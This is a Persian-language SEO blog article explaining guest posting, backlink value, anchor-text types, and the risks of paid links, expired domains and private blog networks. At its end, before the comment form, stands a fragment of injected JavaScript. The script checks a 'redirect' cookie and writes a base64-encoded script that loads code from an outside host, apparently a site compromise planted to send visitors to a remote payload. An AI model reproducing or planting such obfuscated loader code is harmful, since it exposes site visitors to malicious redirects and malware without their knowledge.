بدون دیدگاه
2019/11/28
1359 بازدید

پست مهمان (guest posting) چیست؟

نوشتن پست میهمان یک کار پر ریسک و در عین حال می تواند یک سرمایه گذاری خوب برای سایت شما به حساب آید. پست میهمان می تواند برای فرآیند بازاریابی شما نسبتا ارزشمند باشد و همچنین می تواند از برخی جهات مضر باشد. قرار نیست چند پست میهمان بد، سئو سایت شما را خراب کند و متقابلاً چندین پست خوب، شما را به شهرت برساند. در این مقاله به طور کامل بررسی می کنیم که پست مهمان چیست و په تاثیری بر سئو سایت شما خواهد داشت.

منظور از پست میهمان چیست؟

نوشتن پست مهمان “guest posting” یا “guest blogging”، روشی است که در آن یکی از پست های وبلاگتان را در وبلاگ فرد دیگری، به منظور ایجاد و ساخت روابط بیشتر، ایجاد ارزش و اعتبار و ایجاد لینک، منتشر می کنید. اگر می خواهید پست میهمان را فقط به منظور بهبود سئو سایتتان منتشر کنید، باید بسیار مراقب باشید، چراکه این پست ها اغلب شامل کامنت های اسپم است. در عین حال، اگر پست میهمان در جای درستی منتشر شود، می تواند تاثیر مثبتی روی سئو سایتتان بگذارد.

آیا نوشتن پست مهمان (guest blogging) در سئو تاثیر مثبت دارد؟

اگر بخواهیم به طور خلاصه جواب دهیم، بله. شما در پست میهمان می توانید به سایت خود لینک بدهید، که خب این یک امتیاز مثبت برای سئو سایت شما می باشد. اما همانند سایر تکنیک ها، پست مهمان هم می تواند به سئو سایت شما آسیب برساند، بستگی به طرز استفاده شما از این تکنیک دارد.

نوشتن پست میهمان، جزو فاکتورهای سئو داخلی به حساب نمی آید، و به بازاریابی درونگرا یا همان inbound marketing مربوط می شود. پس بگذارید مزایا و تاثیرات بالقوه ای که ارسال پست مهمان می تواند بر روی سایت شما داشته باشد را لیست کنیم.

پست مهمان چیست

 • سایت میزبان می تواند به سایت شما لینک بدهد
 • سایت میزبان می تواند برای سایت شما، ترافیک ایجاد کند.
 • سایت میزبان می تواند سایت و سایر پروفایل های شما را توسط شبکه های اجتماعی خود تبلیغ کند.
 • کاربران با نام و وجهه ی سایت شما در پست میهمان آشنا می شوند.
 • نام برند و لوگوی شما در پست میهمان، می تواند آگاهی از برندتان را افزایش دهد.
 • محتواهای خوب و با کیفیت می تواند شما را تبدیل به یک منبع ارزشمند با اسم برند خودتان کند.

با این حال، بیشتر این موارد نمی تواند سئو سایت و یا رتبه شما را در موتورهای جستجو تحت تاثیر قرار دهد. گوگل بر ترافیک سایت شما، بیش از یک مفهوم کلی نظارت نمی کند، اگرچه ممکن است گاهی اوقات غیر از این باشد و از برخی جهات تاثیر گذار باشد. سایتهای بزرگ به دلیل لینک ها و محتواهای خود در رتبه های بالا قرار می گیرند نه به دلیل ترافیکشان.

در حقیقت، اصلی ترین تاثیری که نوشتن پست میهمان که بر روی سئو دارد، لینک است. این لینک، هم می تواند برای سایت شما مفید باشد و هم می تواند به آن آسیب برساند، می تواند کم ارزش یا با ارزش باشد که در ادامه به طور کامل توضیح خواهم داد.

ارزش یک لینک

یک لینک از سایت A به سایت B به عنوان یک رای برای سایت شما از دید موتورهای جستجو محسوب می شود. لینک ستون اصلی اینترنت را تشکیل می دهد و امروز زیر بنای عملکرد گوگل را تشکیل می دهد.

در روزگارهای قدیم، لینک فقط یک لینک بود. اصلا مهم نبود که این لینک از کجا آمده، هر لینک، یک امتیاز به حساب می آمد. یک سایت با 20 امتیاز، رتبه بالاتری نسبت به یک سایت با 10 امتیاز می گرفت. حتی اگر سایتی که 20 امتیاز داشت، کل لینک ها را از یک سایت (domain) دریافت می کرد و سایتی که 10 امتیاز داشت، از 10 سایت مختلف لینک دریافت می کرد.

  بازاریابی جستجوی پولی یا سئو: به نظر شما کدام بهتر است؟

اما امروزه نکات خیلی زیادی برای ارزش یک لینک وجود دارد. در اینجا به برخی از اصلاح کننده های احتمالی اشاره می کنیم:

 • اگر لینک، از یکی دیگر از سایت های خودتان باشد، ارزش نسبتا کمتری خواهد داشت.
 • اگر لینک از سایتی باشد که با موضوع سایت شما خیلی بی ربط است، خیلی ارزش کمتری خواهد داشت.
 • اگر یک لینک از یک جایی باشد که ارزش و اعتبار بالایی در صنعت شما دارد، ارزش خیلی بالایی خواهد داشت.
 • اگر یک لینک از دامنه های .edu  و .gov باشد، ارزش بالاتری خواهد داشت.
 • اگر یک لینک با تگ “nofollow” باشد، هیچ ارزشی نخواهد داشت. (البته در استراتژی لینک سازی خاجی، شما به لینک های نو فالو نیز، نیاز دارید)

این فقط خلاصه ای بود از آنچه که برای محاسبه ارزش یک لینک مورد استفاده قرار می گیرد. پس برای همین است که باید در انتخاب سایتی که می خواهید برای پست میهمان استفاده کنید، دقت فراون به خرج دهید.

شما می خواهید لینک ها برای شما ارزش و اعتبار به همراه داشته باشند. این بدان معنی است که این لینک ها باید تا جای ممکن منحصر به فرد باشند، تا جای ممکن از یک سایت معتبر باشند و در یک محتوای ارزشمند قرار بگیرند. اگر هر یک از این موارد را در انتشار پست میهمان رعایت نکنید، ارزش لینک ها به طور چشمگیری کاهش می یابد.

اهمیت محتوای منحصر به فرد برای سایت شما

استفاده از محتوای تکراری (duplicate) در بسیاری از وب سایتها معمول است و اگر درست مدیریت شوند، اغلب عاری از اهداف مخرب است. اما محتواهای کپی (copy)، اغلب به صورت الگوریتمی یا دستی جریمه می شوند. بهتر است بدانید که محتوای تکراری مجازات نمی شود، اما یک روش بهینه هم برای سایت نخواهد بود. به هنگام تغییر در محتوای کپی و منحصر به فرد کردن آن، بسیار مراقب باشید.

 • اگر بخواهیم کیفیت یک صفحه را بررسی کنیم محتوای تکراری (duplicate) یا محتوای کپی (copy) یک شاخص بد محسوب می شود.
 • اگر در وبسایت خود از محتوا های duplicate استفاده می کنید، ممکن است وبسایت شما توسط برخی الگوریتم های گوگل، “low quality” شناخته شود.
 • اگر تمام محتواهای روی سایتتان کم کیفیت باشد، پس از دید گوگل نیز یک سایت کم کیفیت خواهید داشت.
 • اگر شما بک لینک های جعلی و ساختگی دارید، پس قطعا این یک فاجعه برای سایت شماست.

چگونه پست میهمان باعث بهبود سئو می شود؟

بک لینک

اصلی ترین تاثیر پست میهمان، بر سئو سایت شما از طریق لینک منتقل می شود. زمانیکه با سایت های دیگر مشارکت می کنید، لینک های بیشتری دریافت می کنید.

بک لینک ها، یکی از مهم ترین فاکتورهای رتبه بندی در بهینه سازی برای موتورهای جستجو می باشند. گوگل چندین معیار برای درجه بندی یک لینک دارد که شامل دامنه و صفحه ای که یک لینک در آن وجود دارد، می شود. جایگاه یک لینک در صفحه و وجود انکرتکست نیز، جزو این معیارها می باشد.

در این بخش به شما توضیح می دهم که چطور از لینک هایی که از پست وبلاگ به دست می آورید برای بهبود استراتژی سئو سایت خود استفاده کنید.

  آیا باید از ابزار آپدیت شده disavow links استفاده کنیم؟

هدف اصلی شما به دست آوردن لینک های follow است ولی این را بدانید که شما به لینک های نوفالو نیز در استراتژی های خود نیاز دارید پس لطفا سایت خود را در لینک های فالو غرق نکنید.

جایگاه لینک

به طور ایده آل، لینک شما در بدنه ی مقاله قرار می گیرد و با بقیه متن مرتبط است پس باید موضوع اصلی مقاله را پوشش دهد.

هم چنین پست مهمان، معمولا شامل یک پاراگراف درباره ی بیوگرافی و تاریخچه شخص یا کمپانی می باشد و به طور معمول، نویسنده لینک را در همان پاراگراف اول در بیوگرافی جای می دهد.

این کار خوب است ولی بهتر است قبلش از وبلاگی که می خواهید پستتان را در آن انتشار دهید، راجع به جایگاه لینک در متن بپرسید. به خصوص اگر قرار است به خواننده ارزشی اضافه کند یا با متن جور باشد.

چرا وجود لینک در بدنه مهم است؟

برای اینکه وجود متن در بدنه می تواند لینک های طبیعی تری هم برای خواننده و هم برای وبسایت شما ایجاد کند و همچنین می تواند پست شما را ساپورت کند. این لینک ها فقط برای سئو شما خوب نیستند بلکه اگر در جای درستی قرار بگیرند، می توانند توسط خوانندگان کلیک شوند.

انکرتکست (anchor text) در سئو

انکرتکست در سئو، در واقع بخشی از متن است که به صورت لینک در می آید.

در اینجا یک مثال از کد html انکرتکست وجود دارد:

<a/>ویکی دمی<“a href=”https://wikidemy.ir>

در مثال بالا، انکرتکست شما، “ویکی دمی” خواهد بود.

چندین نوع انکرتکست مختلف وجود دارد:

 • برند: این انکرتکست شامل نام برند می باشد مثلاً ویکی دمی، ویکی پدیا یا wikidemy.ir.
 • شامل کلمه کلیدی: انکرتکست شامل کلمه کلیدی خاصی است که می خواهید با آن رتبه بگیرید. برای مثال: “طراحی سایت” یا “خدمات طراحی سایت”.
 • بخشی کلمه کلیدی و بخشی متن: در این نوع انکرتکست، شما بخشی از کلمه کلیدی را در قالب متنی قرار می دهید. برای مثال “شرکت ارائه دنده خدمات سایت” یا “بهترین سایت آموزش سئو” یا “بهترین کرم پودر برای پوست چرب کدام است” و … .
 • URL: در این نوع انکرتکست لینک را به خود URL می دهیم که معمولا برای ذکر منبع کاربرد دارد.
 • انکر تکست هایی مانند: “اینجا” ، “کلیک کنید” ، “لینک” و … که به اصطلاح “white noise” نامیده می شوند .

انکرتکست ها باعث می شوند تا افراد و موتورهای جستجو بفهمند که یک صفحه راجع به چیست، که می توانند تاثیر عظیمی بر روی رتبه بندی ها داشته باشند. برای مثال، اگر شما می خواهید یک صفحه خاص با مثلاً “پست مهمان” رتبه بگیرد، آن وقت ممکن است از این کلمه کلیدی در انکرتکست های خود استفاده کنید.

با این حال، استفاده بیش از حد از انکرتکست های یکسان و حاوی کلمات کلیدی توصیه نمی شود چون ممکن است گوگل آن را به عنوان بهینه سازی بیش از حد برای یک سایت در نظر بگیرد.

باید بدانید که اگر می خواهید لینک های طبیعی داشته باشید پس باید در نظر بگیرید که همه مردم با یک انکرتکست یکسان به شما لینک نمی دهند. بنابراین هنگام لینک سازی داخلی یا خارجی نباید فقط تمرکزتان روی سئو باشد.

راحت ترین راه این است که لینک هایی بسازید که ارزش را منتقل کند و در متن منطقی به نظر برسد. ایجاد چنین لینک هایی بدان معنی است که دیگر لازم نیست شما یک انکرتکست را هزاران بار تکرار کنید.

  آیا دامین آتوریتی در سئو موثر است؟راه های افزایش DA و PA

چه تعداد انکرتکست های غنی از کلمات کلیدی اضافه کنیم که به برای سئو مفید باشد؟

اول از همه باید بگویم که ما فقط قواعد گوگل را می دانیم و نمی توانیم به طور دقیق تعیین کنیم که چه تعداد انکرتکست در پست های میهمان می تواند به سئو سایت شما کمک کند.

با این حال، اگر می خواهید محافظه کارانه عمل کنید، انکرتکست هایی که عین کلمه کلیدی را شامل شود، نباید بیش از 20% کل لینک هایتان را شامل شود. سایت Ahrefs یک مطالعه انجام داده که چطور انکرتکست در رتبه بندی تاثیر می گذارد. اگر نگران نسبت به کار بردن انکرتکست های غنی از کلمات کلیدی هستید، می توانید این مقاله را مطالعه کنید.

یک حقیقت تلخ: برای پست میهمان باید پول پرداخت کنید!

برای این موضوع خودتان را آماده کنید که وبلاگ نویسان در ازای انتشار پست، از شما پول بخواهند. فرقی نمیکند که چه اسمی بر روی این روند بگذارید، در نهایت از شما خواسته می شود که در ازای لینک دادن به سایتتان، پول پرداخت کنید که این کار برخلاف خط مشی های گوگل است.

من به شخصه این کار را به دلیل ریسک های بالایی که دارد توصیه نمی کنم. پرداخت پول در ازای گرفتن لینک، کاملاً برخلاف قواعد گوگل است و زمانی که گوگل متوجه این فعالیت شود، شما شامل پنالتی دستی گوگل خواهید شد.

مهم ترین چیز در مورد گرفتن لینک، ایجاد یک پروفایل لینکی است که طبیعی به نظر برسد. این بدان معناست که شما باید انواع مختلف لینک را داشته باشید.

مراقب دامنه های رهاشده و PBN ها باشید

هنگام جستجو برای وبلاگ ها، به احتمال زیاد با دامنه های رها شده و یا PBN ها مواجه می شوید. به طور خلاصه، دامنه های رها شده دامنه های منقضی شده با پروفایل لینک هستند که افراد آنها را می خرند، محتوای کم کیفیت روی آن می گذارند و سپس لینک هایشان را می فروشند. این یک راه برای افرادی است که می خواهند از طریق فروش لینک، کسب درآمد کنند.

مشکلی ندارد که شما یک دامنه قدیمی و منقضی شده را بخرید و از آن برای نیازهایتان استفاده کنید، اما به شرطی که روی آن دامنه کلی کار انجام دهید و آن را به یک وبسایت معتبر تبدیل کنید. هم چنین شما باید مطمئن باشید که لینک های قدیمی آن روی رتبه بندی سایتتان تاثیر می گذارند.

PBN نیز خلاصه Private blog network می باشد و شامل مجموعه وب سایت هایی (گاهی اوقات هزاران وب سایت) است که به صورت خصوصی ساخته شده ان (یعنی گوگل نمی داند که صاحب تمام این وبسایت ها یک نفر است). هدف اصلی PBN، لینک دادن به یک سایت اصلی و قوی کردن آن می باشد. این کار نیز بر خلاف قواعد است و گوگل به شدت با چنین ساختاری برخورد می کند و آنها را پنالتی می کند.

کلام آخر

چیز دیگری که نباید فراموش کنید، این است که امکان دارد، پست میهمان شما در گوگل رتبه بگیرد و حتی بسته به میزان ایمپرشن، کلیک بگیرد. برای اینکه این اتفاق بیفتد، شما باید یک محتوای بهینه شده برای سئو بنویسید. با این کار می توانید محتوایی تولید کنید که در موتورهای جستجو رتبه بگیرد و در نهایت لینک قوی تری به سایتتان برود.

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*
*

7 − 2 =